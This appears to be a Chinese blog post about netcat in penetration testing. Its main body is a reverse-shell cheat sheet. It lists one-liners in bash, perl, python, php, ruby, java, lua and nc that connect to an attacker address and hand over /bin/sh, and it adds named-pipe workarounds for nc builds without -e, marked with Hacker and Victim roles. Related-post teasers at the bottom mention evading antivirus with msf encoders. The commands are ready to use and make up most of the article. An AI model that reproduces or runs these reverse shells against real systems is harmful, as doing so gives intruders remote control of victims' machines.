NC渗透测试

最新推荐文章于 2024-05-13 10:57:55 发布
最新推荐文章于 2024-05-13 10:57:55 发布
阅读量1.6k 收藏 1
点赞数

参考:

http://www.freebuf.com/articles/system/10632.html

http://www.waitalone.cn/linux-shell-rebound-under-way.html

https://docs.python.org/2/py-modindex.html

大家在做渗透测试的时候,遇到linux的服务器,想反弹shell回来本地溢出提权,怎么办?上传反弹脚本?当然可以,今天再告诉大家几种方法,国外大牛和国内大牛整理的,希望大家喜欢。

bash

bash版本:

1 bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

注意这个是由解析shell的bash完成,所以某些情况下不支持

perl版本:

1 perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

python版本:

1 python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

php版本:

1 php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

ruby版本:

1 ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

nc版本:

1 nc -e /bin/sh 10.0.0.1 1234
2 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
3 nc x.x.x.x 8888|/bin/sh|nc x.x.x.x 9999

java版本

1 r = Runtime.getRuntime()
2 p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
3 p.waitFor()

lua版本:

1 lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"

nc不使用-e:

01 Hacker:nc -lvnp listenport
02 Victim:mknod /tmp/backpipe p
03 Victim:/bin/sh 0</tmp/backpipe | nc attackerip listenport 1>/tmp/backpipe
04 不使用nc
05 Method 1:
06 Hacker: nc -nvlpp 8080
07 Victim: /bin/bash -i > /dev/tcp/173.214.173.151/8080 0<&1 2>&1
08 Method 2:
09 Hacker: nc -nvlpp8080
10 Victim: mknod backpipe p && telnet 173.214.173.151 8080 0backpipe
11 Method 3:
12 Hacker: nc -nvlpp8080
13 Hacker: nc -nvlpp8888
14 Victim: telnet 173.214.173.151 8080 | /bin/bash | telnet 173.214.173.151 8888

参考文章:

http://zone.wooyun.org/content/5064

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

对于瑞士军刀nc我们再熟悉不过了,经常被用来进行数据包发送,文件传送以及反弹shell。在渗透测试过程中如果想反弹shell我们通常的做法是:

nc -l -vv -p 2222 -e /bin/bash

在Linux的大部分发行版中都默认编译了nc,但也许是出于安全考虑,发行版中默认编译的nc往往没有-e选项(没有define一个
GAPING_SECURITY_HOLE常量),也就是说我们不能通过-e选项绑定目标的shell,使得我们在利用上受到限制,但这种情况下是不是就
没办法利用了呢?天无绝人之路,来看下面的TIP。


在Attack这边依然用nc -lnvp listenport监听某端口,在目标环境中依次执行以下命令:

root@bt:~#mknod /tmp/backpipe p
root@bt:~#/bin/sh 0</tmp/backpipe | nc x.x.x.x listenport 1>/tmp/backpipe

第一条命令使用mknod在tmp目录下创建一个管道backpipe,第二条命令首先将默认shell环境的输入
重定向给刚才创建的管道,然后将输出通过nc attackerip
listenport重定向到攻击者一端,最后将shell的执行结果再重定向到管道中。

网上查了下mknod命令,说是只能root用户才有权限执行,可是经过测试普通权限的用户也可以创建管道等特殊文件,如果没有权限使用mkfifo /tmp/backpipe也可以创建一个管道。

------------------------------------

NC的原生做法:

nc -l -vv -p 2222 -e /bin/bash
无法使用NC反弹的时候可以这样

先在tmp创建一个普通管道
mknod /tmp/backpipe p
或者
mkfifo /tmp/backpipe p
然后管道一边接入shell,一变用NC反弹到攻击者主机x.x.x.x
/bin/sh 0</tmp/backpipe | nc x.x.x.x listenport 1>/tmp/backpipe


PS:攻防的对抗一直在思路的转变之间,将原有思路逆转,可能收获不一样的东西!



Letter_
关注
内网穿透(nc)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-28 3547
nc 小巧强悍,可以读写TCP或UDP网络连接,它被设计成一个可靠的后端工具, 能被其它的程序或脚本直接驱动。同时,它又是一个功能丰富的网络调试和开发工具 ,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能, 它基于socket协议工作。在渗透测试领域,我们通常利用它来反弹shell通过一边监听端口,一边发送消息去该端口,形成一个简易版本的服务端—客户端模型。 客户端: 客户端: 主机 当肉鸡处于内网当中,需要主机有一个公网ip,然后让肉鸡主动连接主
渗透测试流程与内网渗透测试实战
悦分享
07-15 7285
关于免杀,我使用的全部是msf的编码自免杀,64位使用的是x64/zutto_dekiru,32位使用的是x86/shikata_ga_nai,360都没有拦截。虽然靶机中有360,但是我直接上传的mimikatz也没有被杀,所以我有些怀疑是360的版本比较低,除了web服务器上传的第一个payload,其它都进行了编码处理,而第一个也确实没有执行成功,这说明360至少对第一个payload是拦截了的。
渗透神器系列】nc
lansefly1990的专栏
12-21 1119
【渗透神器系列】nc 发表于 2017-04-10   |   分类于 安全工具   |   热度 3125 ℃   工欲善其事,必先利其器   从事渗透测试工作几年了,在做项目过程中发现良好的渗透技术固然重要,但欲测试出更多的结果,离不开强大的工具。即使是能力超强的大牛,我想也不可能完全手工做渗透,毕竟渗透测试还是个体力活。   现在有些人认为渗透测试越来越简单了,因为开源的自动化工具...
Kali Linux渗透测试之基本工具--NC(2)
weixin_43803070的博客
05-22 224
** 传输文件/目录 ** • 传输文件( B->A ) A:root@kali:~# nc -lp 4444 > 2.mp4 B:root@metasploitable:~# nc -nv 192.168.1.100 4444 < AWVS\ 01.avi -q 1 或(A->B) A:root@kali:~# nc -q 1 -lp 4444 < 2.mp4 B...
渗透测试笔记】之【基本工具:NC
AA8j的博客
05-06 577
常用工具 经常使用且功能强大,安全从业者必不可少的帮手 Nc/ncat Wireshark Tcpdump NETCAT——NC 网络工具中的瑞士军刀——小身材、大智慧 侦听/传输模式 telnet(可完全代替)/获取banner信息 传输文本信息 传输文件/目录 加密传输文件 远程控制/木马(不会被查杀) 加密所有流量 流媒体服务器 远程克隆硬盘 NC——TELNET/BANNER 此时...
渗透测试工具-瑞士军刀NC
aming小老弟
01-15 8963
NC: netcat 一个简单、可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听 可作为server 以TCP或UDP方式侦听指定端口 (2)端口的扫描 nc可以作为client发起TCP或UDP连接 (3)机器之间传输文件 (4)机器之间网络测速 控制参数 -l 指定nc将处于侦听模式,被当作server 侦听并接受连接,而非向其它地址发起连接。 -p 暂未用到(老版本的nc可能需要在端口号前加-p参数) -s 指定发送数据的源IP地址,适用于多网卡机 -u 指定nc使用U
黑盒渗透测试简介1
malihexiaoxiao的博客
03-23 576
渗透测试,是通过模拟恶意攻击者进行攻击,来评估系统安全的一种评估方法;我们会从攻击的角度判断软件系统是否安全。一般地,测试者会使用某些测试工具或者人工模拟攻击者的输入,找出运行时刻目标系统所存在的安全漏洞。
渗透测试完整流程(未完待续)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
05-26 1698
目录 信息收集 渗透测试流程图 什么是渗透测试渗透测试就是利用我们所掌握的网络安全知识,对目标网站进行一步一步的渗透,发现其中存在的漏洞和隐藏的风险,然后编写一篇测试报告,提供给我们的客户。客户根据测试报告,对网站进行漏洞修补,以防止被黑客的入侵服务器,造成不可估量的损失! 开始一次渗透测试前,一定要确保我们的所有渗透测试目标,都已经拿到了客户的授权。如果没有拿到授权就对一个网站进行测试,《网络安全法》了解一下 渗透测试可分为白盒测试和黑盒测试 白盒测试: 白盒测试就是客户给我们
渗透测试6---神器nc,frp内网穿透,window下的netsh端口转发,window下的内网穿透工具lcx
初遇我ㄖ寸の热情呢?
04-14 8708
nc/netcat/ncat简史 nc是代理转发的神奇 nc被誉为网络安全界的瑞士军刀,端口扫描工具,也是一款安全工具,还能是一款监测工具,通过使用TCP或UDP协议的网络连接去读写数据 nc的版本非常乱,有很多版本。 传统版本:(有扫描功能,现代版本没有) netcat-traditional : Kali Linux默认的版本,命令为nc或netcat netcat-openbs...
“不一样”的真实渗透测试案例分析
HBohan的博客
07-26 2629
前言 本文是由一次真实的授权渗透案例引申而出的技术分析和总结文章。在文章中我们会首先简单介绍这次案例的整体渗透流程并进行部分演绎,但不会进行详细的截图和描述,一是怕“有心人”发现端倪去目标复现漏洞和破坏,二是作为一线攻击人员,大家都明白渗透过程也是一个试错过程,针对某一个点我们可能尝试了无数种方法,最后写入文章的只有成功的一种,而这种方法很有可能也是众所周知的方法。因此我们只会简单介绍渗透流程,然后提取整个渗透过程中比较精华的点,以点及面来进行技术分析和探讨,望不同的人有不同的收获。 白嫖的福音网安学习资.
渗透入侵\NC上传利器.zip
07-15
渗透入侵\NC上传利器
渗透测试笔记】之【内网渗透——传输层隧道(nc的使用:nc的正反向shell、bash(1)
最新发布
2401_84969775的博客
05-13 414
(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13)目录,ubuntu是。
渗透测试工具学习笔记(1)——netcat(nc
qq_39700392的博客
05-22 612
-v 显示详细输出内容 -n 跟IP地址,不进行DNS解析 -l 打开一个listen端口 -p 端口号 -q n 当标准输出完成后延迟n秒断开 -z 扫描模式,不做I/O操作 (1)telnet/banner nc -vn ip地址 端口号 pop3(110) smtp(25) http(80) (2)传输文本信息 sudo nc -l -p ...
用友NC的一些漏洞复现
热门推荐
yzl_007的博客
12-15 1万+
用友NC的一些漏洞复现 一、BeanShell Test Servlet命令执行 漏洞介绍:用友NC是面向集团企业的管理软件,其在同类市场占有率中达到亚太第一。该漏洞是由于用友NC对外开放了BeanShell接口,攻击者可以在未授权的情况下直接访问该接口,并构造恶意数据执行任意代码并获取服务器权限。 影响范围:NC 6.5版本 复现过程: 访问对应网站后界面如下: 漏洞url就是:ip地址:端口/servlet/~ic/bsh.servlet.BshServlet 后续还可以写shell进去,但是这里不
渗透测试基本工具:netcat——nc
whiteinblack
10-15 3163
NETCAT功能总结: nc可以完成所有Telnet可以完成的工作 传输文本信息 传输文件/目录 加密传输文件 远程控制/木马 加密所有流量 流媒体服务器 远程克隆硬盘 具体操作: NC——TELNET nc -vn [ip] [port] nc通信,取证: 用kali2号监听4399端口 用kali1号连接2号的4399端口: 一号机简单取证发送给2号: ...
python反弹shell_Linux下NC反弹shell命令(推荐)
weixin_32223631的博客
02-20 722
本机开启监听:nc -lvnp 4444nc -vvlp 4444目标机器开启反弹bash版本:bash -i >& /dev/tcp/10.0.0.1/8080 0>&1perl版本:perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"))...
NetCat(NC)在渗透测试中的常见应用以及中文版参数解释
Hvnt3r的博客
03-21 4161
NetCat简称NC,是一款体积小巧但功能十分强大的网络工具,享有网络工具中的“瑞士军刀”之称,深得网络安全从业者的喜爱,在此我总结以下NetCat在渗透测试和部分其他情景下的使用方法:1.作为文本传输工具2.作为文件的传输工具3.加密传输文件4.加密数据流量5.远程克隆硬盘6.作为木马进行远程控制7.作为流媒体服务器参数中文对照-d 后台模式-e prog 程序重定向,一旦连接,就执行 [危险!...
Kali Linux渗透测试之基本工具--NC(电子取证)
weixin_43803070的博客
05-13 2277
** 1. NETCAT – NC ** ** 类似telnet目标端口、发送指令、连接对方的服务,nc可以作为客户端使用,也可以作为服务端使用。 常用命令: ** root@kali:~# nc -vn // v显示详细的连接相关信息。n跟IP地址,最好不要跟域名。 如果跟的是域名的话,不会自己去做域名解析或者很慢。 root@kali:~# ping pop3.163.com //查看1...
渗透测试笔记】之【内网渗透——传输层隧道(nc的使用:nc的正反向shell、bash、python、php、java的反向shell、内网转发)】
AA8j的博客
10-21 1503
文章目录实验环境1 下载与部署2 使用方法2.1 正向shell2.2 反向shell 实验环境 kali(攻击机,外网地址:192.168.8.48) Windows2012(边界服务器,外网地址:192.168.8.56,内网地址:10.1.1.10) CentOS7(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13) Windows2012(DC,内网地址:10.1.1.2) 1 下载与部署 下载地址:https://github.com/AA8j/SecTools/tre
Kali Linux中文版秘籍:安装与渗透测试指南
Pritchett和David DeSmet编著,飞龙翻译的专业书籍,专注于介绍Kali Linux的渗透测试技术。Kali Linux是一款专为安全攻击而设计的Linux发行版,继承了BackTrack Linux的传统,主要用于评估计算机系统的安全性。书中...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值